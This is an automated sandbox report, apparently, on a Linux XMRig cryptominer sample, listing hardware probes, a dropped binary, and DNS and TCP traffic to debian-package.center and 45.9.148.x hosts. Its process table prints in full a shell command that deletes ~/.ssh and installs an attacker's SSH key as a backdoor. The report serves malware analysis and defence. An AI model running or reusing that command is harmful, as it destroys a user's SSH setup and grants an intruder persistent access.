Analysis Overview
SHA256
7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08
Threat Level: Known bad
The file 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Xmrig family
Executes dropped EXE
Loads a kernel module
Enumerates running processes
Checks hardware identifiers (DMI)
Reads hardware information
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Enumerates kernel/hardware configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 12:54
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.rsync/a/anacron | N/A |
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.rsync/a/anacron | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /tmp/.rsync/a/anacron | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.rsync/a/anacron | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/mounts | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/meminfo | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/driver/nvidia/gpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/elog | /tmp/.rsync/a/anacron | N/A |
Processes
/tmp/.rsync/a/anacron
[/tmp/.rsync/a/anacron]
/bin/sh
[sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| NL | 45.9.148.129:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.129:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.129:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.129:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| NL | 45.9.148.125:80 | tcp | |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
| US | 8.8.8.8:53 | debian-package.center | udp |
